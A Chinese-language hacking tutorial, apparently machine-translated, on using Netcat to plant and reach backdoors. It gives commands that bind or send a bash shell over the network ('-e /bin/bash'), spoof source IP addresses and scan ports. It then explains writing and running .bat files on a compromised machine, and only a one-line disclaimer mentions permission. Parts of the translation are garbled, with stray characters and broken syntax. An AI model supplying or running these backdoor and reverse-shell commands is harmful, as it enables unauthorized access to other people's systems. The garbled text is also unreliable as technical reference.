如何使用Netcat

步骤1：获取Netcat

现在，我想拥有的第一件事是netcat在我自己的计算机上。不要害怕安装它。 Netcat本身不是后门，但可用于创建后门。 Netcat基本上是类固醇上的Ms-DOS，因此，如果您认真对待黑客攻击，则应该购买netcat。

要获取netcat，请前往Google进行搜索，如果您使用的是Windows，则应为.exe使用Google windows netcat 。

拥有.exe后，请使用将其放在Windows System32文件中，以便可以从cmd提示符下运行它。

此后，您只需在cmd提示符下键入nc即可使用它，

例如，如果您想进入安装的后门，将使用命令

nc -v

下一步，我将介绍更多命令。

步骤2：基本的Netcat命令

-e 将程序入站程序执行到exec（危险！）

-g 网关源路由跃点，最多8

-G 个源路由指针：4，8，12，。 。.

-h 此发送邮件，扫描端口的

-i 秒延迟间隔

-l 《/strong》模式，对于入站连接

-L 进行更严格的侦听，然后在套接字关闭时重新侦听e

-n 仅数字的IP地址，没有DNS

-o 文件的十六进制流量转储

-p 端口本地端口号

-r 随机分配本地和远程端口

-s addr本地源地址

-t answer TELNET协商

-u UDP模式

-v 冗长（使用两次以变得更冗长）

-w 秒连接和最终网络读取的超时

-z零I/O 模式（用于扫描）

端口号可以是单个或范围：mn（含）

连接到远程主机上的端口

nc remote_host 《端口》

》 连接到远程主机上的多个

端口

nc remote_host 《端口》 。.. 《端口》

例如：

nc www.somecompanyasanexample.com 21 25 80

在端口上侦听

传入连接

（也称为A后门）

nc -v -l -p 《端口》

连接到远程主机

并提供bash shell

nc remote_ip 《端口》 -e/bin/bash

请注意，默认情况下Netcat不支持-e标志。要

使Netcat支持-e标志，必须使用

DGAPING_SECURITY_HOLE选项重新编译它

在端口上监听并

在连接后提供bash外壳

nc -v -l -p-《端口》 -e/bin/bash

请注意默认情况下，Netcat不支持-e标志。要

使Netcat支持-e标志，必须使用

DGAPING_SECURITY_HOLE选项重新编译它

端口扫描远程

host

nc -v -z remote_host -

使用-i标志设置延迟间隔：

nc-Âi -v -z remote_host

《端口》-《端口》

管道命令输出

到netcat请求

| nc remote_host 《端口》

例如：

echo“ GET/HTTP/1.0

（输入）

（输入）

” | nc www.somecompanyasanexample.com 80

使用源路由

连接到

远程主机上的端口

nc-œg remote_host

注意：使用-g标志最多可以指定八个跳点。

使用-ÂG标志指定源路由指针。

欺骗源IP

地址

使用-Âs标志欺骗源IP地址：

nc -s spoofed_ip remote_host端口

此命令将导致远程主机响应回

欺骗的IP地址。 -Â标志可以与该表中显示的大多数

命令一起使用。

传输文件

在服务器主机上：

nc -v -l -p 《

在客户端主机上：

nc -v 《服务器主机》 《端口》》 《文件》

客户机主机也可以侦听端口以

接收文件。为此，请在客户端

主机上运行以下命令：

nc -v -l -p 《端口》》文件

，然后在服务器主机上运行以下命令：

nc-Â –v 《客户端主机》 《端口》 《文件

您的netcat都可以使用它们

步骤3：Bat文件部分

一旦您在计算机或服务器中，便可以利用任何您想要的东西，通常我使用vbs和.bat文件，但是我也想通过此方法创建文件，现在，您可以传输文件了通过使用前面所述的命令，但是我想即时创建文件。您可以通过Google搜索通过MS-DOS传输文件的方法，并获得许多方法。我总是喜欢使用Echo方法

一旦您使用，就使用此命令

Echo 在此处输入文件内容》 名称。任何文件类型

这将创建当前目录中指定的文件

一旦您可以通过简单的命令行运行这些文件，

开始文件名

第4步：Netcat

您还可以使用netcat进行很多其他操作，但本指南中并未对此进行详细介绍。 br》请勿在未获胜或没有权限的计算机上使用后门。
责任编辑：wv